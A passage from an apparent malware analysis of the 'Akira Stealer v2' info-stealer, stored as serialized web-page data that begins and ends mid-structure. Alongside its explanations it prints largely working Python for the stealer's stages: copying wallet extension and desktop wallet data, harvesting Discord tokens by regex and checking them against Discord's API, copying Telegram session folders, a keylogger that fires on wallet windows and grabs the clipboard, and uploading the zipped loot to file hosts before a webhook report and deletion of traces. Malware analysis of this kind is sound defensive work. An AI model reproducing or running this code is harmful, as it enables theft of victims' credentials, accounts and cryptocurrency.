",[63,11652,11653],{},"Akira-\u003Cusername>.zip",[12,11655,11656],{},[251,11657,11658],{},"5. 
Exfiltration & Cleanup",[56,11660,11662],{"className":8482,"code":11661,"language":8484,"meta":65,"style":65},"url = Webhook.uploadToGofile(zip_path)\nif not url:\n    url = Webhook.uploadFileio(zip_path) or Webhook.uploadToOshiAt(zip_path)\nWebhook.sendDataTG(zip_path, chatId, startup)\nUtils.clear_client_folder()\n",[63,11663,11664,11669,11674,11679,11684],{"__ignoreMap":65},[102,11665,11666],{"class":104,"line":105},[102,11667,11668],{},"url = Webhook.uploadToGofile(zip_path)\n",[102,11670,11671],{"class":104,"line":111},[102,11672,11673],{},"if not url:\n",[102,11675,11676],{"class":104,"line":329},[102,11677,11678],{},"    url = Webhook.uploadFileio(zip_path) or Webhook.uploadToOshiAt(zip_path)\n",[102,11680,11681],{"class":104,"line":346},[102,11682,11683],{},"Webhook.sendDataTG(zip_path, chatId, startup)\n",[102,11685,11686],{"class":104,"line":650},[102,11687,11688],{},"Utils.clear_client_folder()\n",[1255,11690,11691,11701,11715,11732],{},[1258,11692,11693,11696,11697,11700],{},[251,11694,11695],{},"Primary Channel (GoFile.io):"," The malware first attempts to upload the ZIP archive containing all stolen artifacts to GoFile.io, parsing the JSON response for a ",[63,11698,11699],{},"downloadPage"," URL that grants the attacker direct access to the archive.",[1258,11702,11703,11706,11707,11710,11711,11714],{},[251,11704,11705],{},"Automatic Fallbacks:"," Should the GoFile endpoint fail (network timeout, rate limit, etc.), the code seamlessly falls back to ",[63,11708,11709],{},"file.io",", and if that too returns an empty link, finally to ",[63,11712,11713],{},"oshi.at",". 
Both alternatives are invoked without raising exceptions, ensuring that one of the three services will always be tried in succession.",[1258,11716,11717,11720,11721,11724,11725,805,11728,11731],{},[251,11718,11719],{},"Webhook Reporting:"," Once a URL (or an empty string on persistent failure) is determined, ",[63,11722,11723],{},"Webhook.sendDataTG(...)"," is called, packaging together the download link, machine identifiers (",[63,11726,11727],{},"chatId",[63,11729,11730],{},"startup"," flag) and all category counts (passwords, cookies, autofills, wallets) into a single Discord or Telegram message.",[1258,11733,11734,11737,11738,11741],{},[251,11735,11736],{},"Immediate Cleanup:"," After reporting, ",[63,11739,11740],{},"Utils.clear_client_folder()"," recursively deletes the entire temporary workspace and the ZIP file itself, leaving no trace of the harvested data or the archive on disk.",[2109,11743,11744,11749],{},[12,11745,11746],{},[251,11747,11748],{},"Failure Resilience:",[1255,11750,11751,11758],{},[1258,11752,11753,11754,11757],{},"All upload routines return ",[63,11755,11756],{},"\"\""," on failure instead of throwing, guaranteeing the code flow continues.",[1258,11759,11760],{},"Even if every service is unreachable, the malware still transmits a webhook report (albeit with a missing link) before erasing local artifacts, minimizing forensic remnants unless the process crashes unexpectedly.",[52,11762],{"className":11763},[4854,4855],[12,11765,11766],{},[251,11767,11768],{},"6. Robustness & Error Handling",[1255,11770,11771,11789,11795,11804],{},[1258,11772,11773,11776,11777,11780,11781,11784,11785,11788],{},[251,11774,11775],{},"Granular Exception Handling:"," Every file system interaction—be it ",[63,11778,11779],{},"shutil.copy",", SQLite queries, or ZIP operations—is wrapped in ",[63,11782,11783],{},"try/except"," blocks. 
When an error occurs (locked DB, permission denied, malformed record), the exception is caught and logged via ",[63,11786,11787],{},"Akira.logErrorTg()",", and execution continues, isolating the failure to that specific file or module.",[1258,11790,11791,11794],{},[251,11792,11793],{},"Threaded Isolation per Browser:"," The extraction routines for each supported browser run in their own thread. This multi-threaded design ensures that a crash or deadlock in one browser’s extraction (e.g., corrupt profile, missing key) does not halt or delay the analysis of other browsers.",[1258,11796,11797,11800,11801,11803],{},[251,11798,11799],{},"Silent Fallbacks & Defaults:"," Many auxiliary routines, such as uploading to alternate file hosts, checking remote resources, or spawning subprocesses, employ nested ",[63,11802,11783],{}," without surface-level alerts—maximizing stealth. Default values (empty strings, booleans) are chosen to keep the flow uninterrupted and remove obvious error conditions.",[1258,11805,11806,11809,11810,11813,11814,11817],{},[251,11807,11808],{},"Mutex & Startup Guards:"," A named mutex (",[63,11811,11812],{},"1qsMlseJplTlArIF14f",") prevents multiple instances, while registry checks and ",[63,11815,11816],{},"Utils.CreateMutex()"," protect against concurrent runs, providing additional stability during real-world deployment.",[41,11819,11821],{"id":11820},"_78-wallet-and-token-exfiltration","7.8 Wallet and Token Exfiltration",[12,11823,47],{},[12,11825,11826],{},"In this phase, Akira Stealer v2 performs the most comprehensive sweep for cryptocurrency credentials and session tokens, spanning browser extensions, desktop wallets, messaging tokens, and live keylogging. It executes in parallel threads, ensuring no vector is missed. 
Below is a step-by-step, code-backed deep dive.",[186,11828,11830],{"id":11829},"_781-browser-extension-wallets","7.8.1 Browser Extension Wallets",[12,11832,192],{},[12,11834,11835,11838],{},[251,11836,11837],{},"Targets:"," Over 80 extensions across popular browsers, including MetaMask, Phantom, Trust Wallet, Coinbase Wallet, Solflare, Exodus, Binance Chain Wallet, Keplr, Nami, TronLink, Rabby, Talisman, and more.",[56,11840,11842],{"className":8482,"code":11841,"language":8484,"meta":65,"style":65},"# Hardcoded list of extension IDs and human-friendly names\nwalletsExtensions = [\n    [\"MetaMask\",        \"nkbihfbeogaeaoehlefnkodbefgpgknn\"],\n    [\"Phantom\",         \"bfnaelmomeimhlpmgjnjophhpkkoljpa\"],\n    [\"TrustWallet\",     \"egjidjbpglichdcondbcbdnbeeppgdph\"],\n    [\"CoinbaseWallet\",  \"hfhmhopkfngkjcalldmaepmpilmjjemb\"],\n    [\"Solflare\",        \"bhhhlbepdkbapadjdnnojkbgioiodbic\"],\n    [\"BinanceChain\",    \"fhbohimaelbohpjbbldcngcnapndodjp\"],\n    [\"Keplr\",           \"dmkamcknogkgcdfhhbddcghachkejeap\"],\n    [\"Nami\",            \"lpfcbjknijpeeillifnkikgncikgfhdo\"],\n    [\"Talisman\",        \"fijngjgcjhjmmpcmkeiomlglpeiijkld\"],\n    [\"TronLink\",        \"ibnejdfjmmkpcnlpebklmnkoeoihofec\"],\n    # ... 
plus dozens more mapped in code\n]\n# Extraction loop for each browser profile\nfor browser_name, (user_data, proc_name) in paths.items():\n    base = os.path.join(user_data, \"Default\", \"Local Extension Settings\")\n    for ext_name, ext_id in walletsExtensions:\n        src = os.path.join(base, ext_id)\n        if os.path.isdir(src):\n            dest = os.path.join(Utils.get_temp_folder(), \"Wallets\", f\"{ext_name}_{browser_name}\")\n            shutil.copytree(src, dest, dirs_exist_ok=True)\n            data.ext_wallets_count += 1\n",[63,11843,11844,11849,11854,11859,11864,11869,11874,11879,11884,11889,11894,11899,11904,11909,11914,11919,11924,11929,11934,11939,11944,11949,11954],{"__ignoreMap":65},[102,11845,11846],{"class":104,"line":105},[102,11847,11848],{},"# Hardcoded list of extension IDs and human-friendly names\n",[102,11850,11851],{"class":104,"line":111},[102,11852,11853],{},"walletsExtensions = [\n",[102,11855,11856],{"class":104,"line":329},[102,11857,11858],{},"    [\"MetaMask\",        \"nkbihfbeogaeaoehlefnkodbefgpgknn\"],\n",[102,11860,11861],{"class":104,"line":346},[102,11862,11863],{},"    [\"Phantom\",         \"bfnaelmomeimhlpmgjnjophhpkkoljpa\"],\n",[102,11865,11866],{"class":104,"line":650},[102,11867,11868],{},"    [\"TrustWallet\",     \"egjidjbpglichdcondbcbdnbeeppgdph\"],\n",[102,11870,11871],{"class":104,"line":656},[102,11872,11873],{},"    [\"CoinbaseWallet\",  \"hfhmhopkfngkjcalldmaepmpilmjjemb\"],\n",[102,11875,11876],{"class":104,"line":662},[102,11877,11878],{},"    [\"Solflare\",        \"bhhhlbepdkbapadjdnnojkbgioiodbic\"],\n",[102,11880,11881],{"class":104,"line":668},[102,11882,11883],{},"    [\"BinanceChain\",    \"fhbohimaelbohpjbbldcngcnapndodjp\"],\n",[102,11885,11886],{"class":104,"line":674},[102,11887,11888],{},"    [\"Keplr\",           \"dmkamcknogkgcdfhhbddcghachkejeap\"],\n",[102,11890,11891],{"class":104,"line":680},[102,11892,11893],{},"    [\"Nami\",            
\"lpfcbjknijpeeillifnkikgncikgfhdo\"],\n",[102,11895,11896],{"class":104,"line":9019},[102,11897,11898],{},"    [\"Talisman\",        \"fijngjgcjhjmmpcmkeiomlglpeiijkld\"],\n",[102,11900,11901],{"class":104,"line":9025},[102,11902,11903],{},"    [\"TronLink\",        \"ibnejdfjmmkpcnlpebklmnkoeoihofec\"],\n",[102,11905,11906],{"class":104,"line":9031},[102,11907,11908],{},"    # ... plus dozens more mapped in code\n",[102,11910,11911],{"class":104,"line":9037},[102,11912,11913],{},"]\n",[102,11915,11916],{"class":104,"line":9043},[102,11917,11918],{},"# Extraction loop for each browser profile\n",[102,11920,11921],{"class":104,"line":9049},[102,11922,11923],{},"for browser_name, (user_data, proc_name) in paths.items():\n",[102,11925,11926],{"class":104,"line":9055},[102,11927,11928],{},"    base = os.path.join(user_data, \"Default\", \"Local Extension Settings\")\n",[102,11930,11931],{"class":104,"line":9061},[102,11932,11933],{},"    for ext_name, ext_id in walletsExtensions:\n",[102,11935,11936],{"class":104,"line":9067},[102,11937,11938],{},"        src = os.path.join(base, ext_id)\n",[102,11940,11941],{"class":104,"line":9073},[102,11942,11943],{},"        if os.path.isdir(src):\n",[102,11945,11946],{"class":104,"line":9079},[102,11947,11948],{},"            dest = os.path.join(Utils.get_temp_folder(), \"Wallets\", f\"{ext_name}_{browser_name}\")\n",[102,11950,11951],{"class":104,"line":9085},[102,11952,11953],{},"            shutil.copytree(src, dest, dirs_exist_ok=True)\n",[102,11955,11956],{"class":104,"line":9091},[102,11957,11958],{},"            data.ext_wallets_count += 1\n",[1255,11960,11961,11967],{},[1258,11962,11963,11966],{},[251,11964,11965],{},"Files copied",": Extension-specific IndexedDB, LevelDB, JSON and config files containing encrypted keys, seed phrases, login credentials.",[1258,11968,11969,1062,11972,805,11975,7885],{},[251,11970,11971],{},"Outcome 
folder",[63,11973,11974],{},"Wallets/MetaMask_Chrome/",[63,11976,11977],{},"Wallets/Phantom_Edge/",[186,11979,11981],{"id":11980},"_782-desktop-wallet-applications","7.8.2 Desktop Wallet Applications",[12,11983,192],{},[12,11985,11986,11988],{},[251,11987,11837],{}," Major desktop clients such as Electrum, Exodus, Atomic Wallet, Guarda, Rabby, Coinomi, Zcash, Armory, Bytecoin, Jaxx, Coinomi, etc.",[56,11990,11992],{"className":8482,"code":11991,"language":8484,"meta":65,"style":65},"walletsDesktop = [\n    [\"Electrum\",     os.path.join(os.getenv('APPDATA'), \"Electrum\", \"wallets\")],\n    [\"Exodus\",       os.path.join(os.getenv('APPDATA'), \"Exodus\", \"exodus.wallet\")],\n    [\"AtomicWallet\", os.path.join(os.getenv('LOCALAPPDATA'), \"atomic\", \"Local Storage\", \"leveldb\")],\n    [\"Guarda\",       os.path.join(os.getenv('APPDATA'), \"Guarda\", \"Local Storage\", \"leveldb\")],\n    [\"Rabby\",        os.path.join(os.getenv('APPDATA'), \"rabby-desktop\")],\n    [\"Coinomi\",      os.path.join(os.getenv('APPDATA'), \"Coinomi\", \"wallets\")],\n]\nfor name, path in walletsDesktop:\n    if os.path.isdir(path):\n        Utils.TaskKill(name.lower())\n        dest = os.path.join(Utils.get_temp_folder(), \"Wallets\", name)\n        shutil.copytree(path, dest, dirs_exist_ok=True)\n        data.desktop_wallets_count += 1\n",[63,11993,11994,11999,12004,12009,12014,12019,12024,12029,12033,12038,12043,12048,12053,12058],{"__ignoreMap":65},[102,11995,11996],{"class":104,"line":105},[102,11997,11998],{},"walletsDesktop = [\n",[102,12000,12001],{"class":104,"line":111},[102,12002,12003],{},"    [\"Electrum\",     os.path.join(os.getenv('APPDATA'), \"Electrum\", \"wallets\")],\n",[102,12005,12006],{"class":104,"line":329},[102,12007,12008],{},"    [\"Exodus\",       os.path.join(os.getenv('APPDATA'), \"Exodus\", \"exodus.wallet\")],\n",[102,12010,12011],{"class":104,"line":346},[102,12012,12013],{},"    [\"AtomicWallet\", os.path.join(os.getenv('LOCALAPPDATA'), 
\"atomic\", \"Local Storage\", \"leveldb\")],\n",[102,12015,12016],{"class":104,"line":650},[102,12017,12018],{},"    [\"Guarda\",       os.path.join(os.getenv('APPDATA'), \"Guarda\", \"Local Storage\", \"leveldb\")],\n",[102,12020,12021],{"class":104,"line":656},[102,12022,12023],{},"    [\"Rabby\",        os.path.join(os.getenv('APPDATA'), \"rabby-desktop\")],\n",[102,12025,12026],{"class":104,"line":662},[102,12027,12028],{},"    [\"Coinomi\",      os.path.join(os.getenv('APPDATA'), \"Coinomi\", \"wallets\")],\n",[102,12030,12031],{"class":104,"line":668},[102,12032,11913],{},[102,12034,12035],{"class":104,"line":674},[102,12036,12037],{},"for name, path in walletsDesktop:\n",[102,12039,12040],{"class":104,"line":680},[102,12041,12042],{},"    if os.path.isdir(path):\n",[102,12044,12045],{"class":104,"line":9019},[102,12046,12047],{},"        Utils.TaskKill(name.lower())\n",[102,12049,12050],{"class":104,"line":9025},[102,12051,12052],{},"        dest = os.path.join(Utils.get_temp_folder(), \"Wallets\", name)\n",[102,12054,12055],{"class":104,"line":9031},[102,12056,12057],{},"        shutil.copytree(path, dest, dirs_exist_ok=True)\n",[102,12059,12060],{"class":104,"line":9037},[102,12061,12062],{},"        data.desktop_wallets_count += 1\n",[1255,12064,12065,12078],{},[1258,12066,12067,12070,12071,805,12074,12077],{},[251,12068,12069],{},"Data stolen",": Keystore files (",[63,12072,12073],{},"*.dat",[63,12075,12076],{},"*.json","), private key exports, wallet configuration and transaction history.",[1258,12079,12080,12083],{},[251,12081,12082],{},"Benefit",": Offline wallet contents usable by the attacker to authorize transactions.",[186,12085,12087],{"id":12086},"_783-discord-token-harvest","7.8.3 Discord Token Harvest",[12,12089,192],{},[12,12091,12092],{},"Discord tokens are authentication artifacts—essentially long-lived bearer tokens—that can grant full access to a user’s account without requiring their credentials or MFA. 
Akira exploits this by scanning browser and app data folders for tokens stored by various Discord clients, including Discord Stable, Canary, PTB (Public Test Build), and even modified forks like Lightcord.",[12,12094,12095],{},"The technique targets LevelDB files under the application's Local Storage, where authentication tokens often remain in plaintext. Using regular expressions, the malware scans these .log and .ldb files for patterns that match either regular user tokens or MFA-enabled tokens.",[12,12097,12098],{},"To increase reliability and reduce noise, Akira includes a validation step: it sends a test request to Discord’s /users/@me endpoint using each harvested token. Only tokens that successfully authenticate (HTTP 200) are exfiltrated via webhook—typically to a Discord channel under attacker control.",[12,12100,12101],{},"This method allows attackers to hijack Discord accounts in real time, impersonate the victim, scrape DMs and guilds, or deploy further malware through social engineering—all without triggering login alerts.",[56,12103,12105],{"className":8482,"code":12104,"language":8484,"meta":65,"style":65},"import re, requests\npatterns = [\n    r\"[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{27,100}\",  # User tokens\n    r\"mfa\\.[\\w-]{84,100}\"                      # MFA tokens\n]\ndef harvest_discord(base, webhook_url):\n    db_dir = os.path.join(base, \"Local Storage\", \"leveldb\")\n    for file in os.listdir(db_dir):\n        if file.endswith(('.log', '.ldb')):\n            for line in open(os.path.join(db_dir, file), errors='ignore'):\n                for pat in patterns:\n                    for token in re.findall(pat, line):\n                        # Verify token\n                        h = {\"Authorization\": token}\n                        r = requests.get(\"https://discordapp.com/api/v9/users/@me\", headers=h)\n                        if r.status_code == 200:\n                            uname = r.json()[\"username\"] + \"#\" + 
r.json()[\"discriminator\"]\n                            payload = {\"content\": f\"**Discord** {uname}: `{token}`\"}\n                            requests.post(webhook_url, json=payload)\n",[63,12106,12107,12112,12117,12122,12127,12131,12136,12141,12146,12151,12156,12161,12166,12171,12176,12181,12186,12191,12196],{"__ignoreMap":65},[102,12108,12109],{"class":104,"line":105},[102,12110,12111],{},"import re, requests\n",[102,12113,12114],{"class":104,"line":111},[102,12115,12116],{},"patterns = [\n",[102,12118,12119],{"class":104,"line":329},[102,12120,12121],{},"    r\"[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{27,100}\",  # User tokens\n",[102,12123,12124],{"class":104,"line":346},[102,12125,12126],{},"    r\"mfa\\.[\\w-]{84,100}\"                      # MFA tokens\n",[102,12128,12129],{"class":104,"line":650},[102,12130,11913],{},[102,12132,12133],{"class":104,"line":656},[102,12134,12135],{},"def harvest_discord(base, webhook_url):\n",[102,12137,12138],{"class":104,"line":662},[102,12139,12140],{},"    db_dir = os.path.join(base, \"Local Storage\", \"leveldb\")\n",[102,12142,12143],{"class":104,"line":668},[102,12144,12145],{},"    for file in os.listdir(db_dir):\n",[102,12147,12148],{"class":104,"line":674},[102,12149,12150],{},"        if file.endswith(('.log', '.ldb')):\n",[102,12152,12153],{"class":104,"line":680},[102,12154,12155],{},"            for line in open(os.path.join(db_dir, file), errors='ignore'):\n",[102,12157,12158],{"class":104,"line":9019},[102,12159,12160],{},"                for pat in patterns:\n",[102,12162,12163],{"class":104,"line":9025},[102,12164,12165],{},"                    for token in re.findall(pat, line):\n",[102,12167,12168],{"class":104,"line":9031},[102,12169,12170],{},"                        # Verify token\n",[102,12172,12173],{"class":104,"line":9037},[102,12174,12175],{},"                        h = {\"Authorization\": token}\n",[102,12177,12178],{"class":104,"line":9043},[102,12179,12180],{},"                        r = 
requests.get(\"https://discordapp.com/api/v9/users/@me\", headers=h)\n",[102,12182,12183],{"class":104,"line":9049},[102,12184,12185],{},"                        if r.status_code == 200:\n",[102,12187,12188],{"class":104,"line":9055},[102,12189,12190],{},"                            uname = r.json()[\"username\"] + \"#\" + r.json()[\"discriminator\"]\n",[102,12192,12193],{"class":104,"line":9061},[102,12194,12195],{},"                            payload = {\"content\": f\"**Discord** {uname}: `{token}`\"}\n",[102,12197,12198],{"class":104,"line":9067},[102,12199,12200],{},"                            requests.post(webhook_url, json=payload)\n",[1255,12202,12203],{},[1258,12204,12205,12208],{},[251,12206,12207],{},"Validation",": Only posts valid tokens, preventing stale JWTs from being sent.",[186,12210,12212],{"id":12211},"_784-telegram-session-files","7.8.4 Telegram Session Files",[12,12214,192],{},[12,12216,12217,12219],{},[251,12218,11837],{}," Telegram Desktop/TData",[56,12221,12223],{"className":8482,"code":12222,"language":8484,"meta":65,"style":65},"def steal_telegram(tdata_path, dest_root):\n    if os.path.exists(tdata_path):\n        Utils.TaskKill(\"telegram.exe\")\n        dest = os.path.join(dest_root, \"Wallets\", \"Telegram\")\n        shutil.copytree(tdata_path, dest, dirs_exist_ok=True)\n        data.has_telegram = True\n",[63,12224,12225,12230,12235,12240,12245,12250],{"__ignoreMap":65},[102,12226,12227],{"class":104,"line":105},[102,12228,12229],{},"def steal_telegram(tdata_path, dest_root):\n",[102,12231,12232],{"class":104,"line":111},[102,12233,12234],{},"    if os.path.exists(tdata_path):\n",[102,12236,12237],{"class":104,"line":329},[102,12238,12239],{},"        Utils.TaskKill(\"telegram.exe\")\n",[102,12241,12242],{"class":104,"line":346},[102,12243,12244],{},"        dest = os.path.join(dest_root, \"Wallets\", \"Telegram\")\n",[102,12246,12247],{"class":104,"line":650},[102,12248,12249],{},"        shutil.copytree(tdata_path, dest, 
dirs_exist_ok=True)\n",[102,12251,12252],{"class":104,"line":656},[102,12253,12254],{},"        data.has_telegram = True\n",[1255,12256,12257,12270],{},[1258,12258,12259,1062,12262,12265,12266,12269],{},[251,12260,12261],{},"Files",[63,12263,12264],{},"tdata"," folder containing session keys, ",[63,12267,12268],{},"D877F..."," folder with secret/unsecret files.",[1258,12271,12272,12275],{},[251,12273,12274],{},"Use",": Load into attacker’s Telegram client for full account access.",[186,12277,12279],{"id":12278},"_785-live-wallet-keylogging","7.8.5 Live Wallet Keylogging",[12,12281,192],{},[12,12283,12284],{},"Cryptocurrency wallets are prime targets for modern info-stealers. Akira includes a live keylogger tailored specifically to steal wallet credentials such as seed phrases, private keys, and passwords at the moment of entry. Unlike generic keyloggers, this one activates only when a known wallet window is detected, dramatically reducing noise and increasing efficiency.",[12,12286,12287],{},"The module monitors active window titles and compares them against a hardcoded list of popular wallet apps like MetaMask, Phantom, Atomic Wallet, and others. Once a matching window is in focus, it begins recording keystrokes via system-wide keyboard hooks. When the user presses Enter, the module immediately captures the current clipboard contents—knowing that users often copy secrets during wallet setup or login—and sends both the typed input and clipboard data to the attacker's webhook. 
This approach is extremely effective because it combines two attack vectors:",[1255,12289,12290,12293],{},[1258,12291,12292],{},"Context-aware keylogging, to capture sensitive wallet inputs only when relevant.",[1258,12294,12295],{},"Clipboard hijacking, to extract copied recovery phrases or destination addresses before they’re pasted.",[12,12297,12298],{},"Together, these methods allow attackers to silently compromise wallets in real time, even without browser access or file exfiltration.",[56,12300,12302],{"className":8482,"code":12301,"language":8484,"meta":65,"style":65},"import keyboard, pyperclip\n\nclass WalletKeylogger:\n    def __init__(self, wallet_titles):\n        self.buf = \"\"\n        keyboard.on_release(self.capture)\n        self.wallet_titles = wallet_titles\n\n    def capture(self, event):\n        title = pygetwindow.getActiveWindow().title\n        if any(w in title for w in self.wallet_titles):\n            if event.name == 'enter':\n                data = f\"Keys:{self.buf}\\nClip:{pyperclip.paste()}\"\n                send_to_webhook(data)\n                self.buf = \"\"\n            else:\n                self.buf += event.name\n",[63,12303,12304,12309,12313,12318,12323,12328,12333,12338,12342,12347,12352,12357,12362,12367,12372,12377,12382],{"__ignoreMap":65},[102,12305,12306],{"class":104,"line":105},[102,12307,12308],{},"import keyboard, pyperclip\n",[102,12310,12311],{"class":104,"line":111},[102,12312,7846],{"emptyLinePlaceholder":2180},[102,12314,12315],{"class":104,"line":329},[102,12316,12317],{},"class WalletKeylogger:\n",[102,12319,12320],{"class":104,"line":346},[102,12321,12322],{},"    def __init__(self, wallet_titles):\n",[102,12324,12325],{"class":104,"line":650},[102,12326,12327],{},"        self.buf = \"\"\n",[102,12329,12330],{"class":104,"line":656},[102,12331,12332],{},"        keyboard.on_release(self.capture)\n",[102,12334,12335],{"class":104,"line":662},[102,12336,12337],{},"        self.wallet_titles = 
wallet_titles\n",[102,12339,12340],{"class":104,"line":668},[102,12341,7846],{"emptyLinePlaceholder":2180},[102,12343,12344],{"class":104,"line":674},[102,12345,12346],{},"    def capture(self, event):\n",[102,12348,12349],{"class":104,"line":680},[102,12350,12351],{},"        title = pygetwindow.getActiveWindow().title\n",[102,12353,12354],{"class":104,"line":9019},[102,12355,12356],{},"        if any(w in title for w in self.wallet_titles):\n",[102,12358,12359],{"class":104,"line":9025},[102,12360,12361],{},"            if event.name == 'enter':\n",[102,12363,12364],{"class":104,"line":9031},[102,12365,12366],{},"                data = f\"Keys:{self.buf}\\nClip:{pyperclip.paste()}\"\n",[102,12368,12369],{"class":104,"line":9037},[102,12370,12371],{},"                send_to_webhook(data)\n",[102,12373,12374],{"class":104,"line":9043},[102,12375,12376],{},"                self.buf = \"\"\n",[102,12378,12379],{"class":104,"line":9049},[102,12380,12381],{},"            else:\n",[102,12383,12384],{"class":104,"line":9055},[102,12385,12386],{},"                self.buf += event.name\n",[1255,12388,12389,12395],{},[1258,12390,12391,12394],{},[251,12392,12393],{},"Trigger list",": Window titles including “MetaMask”, “Phantom”, “Atomic Wallet”, etc.",[1258,12396,12397,12400],{},[251,12398,12399],{},"Clipboard",": Captures copied seeds or private keys.",[186,12402,12404],{"id":12403},"_786-packaging-exfiltration","7.8.6 Packaging & Exfiltration",[12,12406,192],{},[12,12408,12409],{},"After collecting browser data, credentials, wallet information, and tokens, Akira proceeds to consolidate and exfiltrate the loot in a highly automated and stealthy manner. This stage marks the final step in the infection chain, and it’s optimized for reliability and minimal forensic footprint. First, all collected data—including browser dumps, logs, and keylogged wallet information—is compressed into a ZIP archive. This ensures the full dataset can be transferred as a single payload. 
The archive is then uploaded to multiple public file-sharing services such as GoFile, File.io, or Oshi.at, depending on availability. These platforms provide anonymous, temporary hosting, and are often used to bypass corporate firewalls or reputation-based blocking. A structured report is simultaneously generated and sent to the attacker via a Discord or Telegram webhook. It includes summary statistics—how many wallets were found, how many tokens were valid, and a direct link to the stolen data. This gives attackers a quick overview of the target’s value without opening the archive.",[12,12411,12412],{},"Finally, the malware deletes the temporary folder and the archive from disk, effectively removing local forensic evidence. By the time a defender discovers the infection, the data is already gone—and often irretrievable.",[56,12414,12416],{"className":8482,"code":12415,"language":8484,"meta":65,"style":65},"# 1) ZIP everything (including Wallets folder)\nzip_path = shutil.make_archive(Utils.get_temp_folder(), 'zip', Utils.get_temp_folder())\n# 2) Attempt upload to primary & fallback services\nurl = Webhook.uploadToGofile(zip_path) or Webhook.uploadFileio(zip_path) or Webhook.uploadToOshiAt(zip_path)\n# 3) Report summary\nembed = {\n    \"title\": \"💰 Wallet & Token Exfiltration Report\",\n    \"fields\": [\n        {\"name\": \"Extension Wallets\", \"value\": data.ext_wallets_count},\n        {\"name\": \"Desktop Wallets\",   \"value\": data.desktop_wallets_count},\n        {\"name\": \"Discord Tokens\",    \"value\": len(valid_tokens)},\n        {\"name\": \"Telegram Sessions\", \"value\": data.has_telegram},\n        {\"name\": \"Archive Link\",      \"value\": url or \"[upload failed]\"},\n    ]\n}\nWebhook.sendDataTG(Utils.get_temp_folder(), chatId, startup)\n# 4) Cleanup local folder & 
ZIP\nUtils.clear_client_folder()\n",[63,12417,12418,12423,12428,12433,12438,12443,12448,12453,12458,12463,12468,12473,12478,12483,12488,12492,12497,12502],{"__ignoreMap":65},[102,12419,12420],{"class":104,"line":105},[102,12421,12422],{},"# 1) ZIP everything (including Wallets folder)\n",[102,12424,12425],{"class":104,"line":111},[102,12426,12427],{},"zip_path = shutil.make_archive(Utils.get_temp_folder(), 'zip', Utils.get_temp_folder())\n",[102,12429,12430],{"class":104,"line":329},[102,12431,12432],{},"# 2) Attempt upload to primary & fallback services\n",[102,12434,12435],{"class":104,"line":346},[102,12436,12437],{},"url = Webhook.uploadToGofile(zip_path) or Webhook.uploadFileio(zip_path) or Webhook.uploadToOshiAt(zip_path)\n",[102,12439,12440],{"class":104,"line":650},[102,12441,12442],{},"# 3) Report summary\n",[102,12444,12445],{"class":104,"line":656},[102,12446,12447],{},"embed = {\n",[102,12449,12450],{"class":104,"line":662},[102,12451,12452],{},"    \"title\": \"💰 Wallet & Token Exfiltration Report\",\n",[102,12454,12455],{"class":104,"line":668},[102,12456,12457],{},"    \"fields\": [\n",[102,12459,12460],{"class":104,"line":674},[102,12461,12462],{},"        {\"name\": \"Extension Wallets\", \"value\": data.ext_wallets_count},\n",[102,12464,12465],{"class":104,"line":680},[102,12466,12467],{},"        {\"name\": \"Desktop Wallets\",   \"value\": data.desktop_wallets_count},\n",[102,12469,12470],{"class":104,"line":9019},[102,12471,12472],{},"        {\"name\": \"Discord Tokens\",    \"value\": len(valid_tokens)},\n",[102,12474,12475],{"class":104,"line":9025},[102,12476,12477],{},"        {\"name\": \"Telegram Sessions\", \"value\": data.has_telegram},\n",[102,12479,12480],{"class":104,"line":9031},[102,12481,12482],{},"        {\"name\": \"Archive Link\",      \"value\": url or \"[upload failed]\"},\n",[102,12484,12485],{"class":104,"line":9037},[102,12486,12487],{},"    
]\n",[102,12489,12490],{"class":104,"line":9043},[102,12491,6410],{},[102,12493,12494],{"class":104,"line":9049},[102,12495,12496],{},"Webhook.sendDataTG(Utils.get_temp_folder(), chatId, startup)\n",[102,12498,12499],{"class":104,"line":9055},[102,12500,12501],{},"# 4) Cleanup local folder & ZIP\n",[102,12503,12504],{"class":104,"line":9061},[102,12505,11688],{},[41,12507,12509,12510,1289],{"id":12508},"_79-discord-and-telegram-token-theft-class-discord","7.9. Discord and Telegram Token Theft (Class: ",[63,12511,5337],{},[12,12513,47],{},[12,12515,12516,12517,12519],{},"Akira Stealer v2’s ",[251,12518,5337],{}," class executes a highly parallelized, multi-stage process to harvest both Discord authorization tokens and Telegram session data. Below, we dissect each component with precise code references and illustrative examples.",[186,12521,12523],{"id":12522},"_791-initialization-path-enumeration","7.9.1 Initialization & Path Enumeration",[12,12525,192],{},[12,12527,12528],{},"Upon instantiation, the constructor builds two sets of target paths:",[56,12530,12532],{"className":8482,"code":12531,"language":8484,"meta":65,"style":65},"# Discord client LevelDB directories\ndiscord_paths = [\n    [f\"{self.ROAMING}/Discord\", \"/Local Storage/leveldb\"],\n    [f\"{self.ROAMING}/Lightcord\", \"/Local Storage/leveldb\"],\n    ...\n]\n\n# Chromium-based browser LevelDB directories\nbrowserPaths = [\n    [f\"{self.ROAMING}/Opera Software/Opera GX Stable\", \"opera.exe\", \"/Local Storage/leveldb\", ...],\n    [f\"{self.LOCAL}/Google/Chrome/User Data\", \"chrome.exe\", \"/Default/Local Storage/leveldb\", ...],\n    ...\n]\n",[63,12533,12534,12539,12544,12549,12554,12558,12562,12566,12571,12576,12581,12586,12590],{"__ignoreMap":65},[102,12535,12536],{"class":104,"line":105},[102,12537,12538],{},"# Discord client LevelDB directories\n",[102,12540,12541],{"class":104,"line":111},[102,12542,12543],{},"discord_paths = 
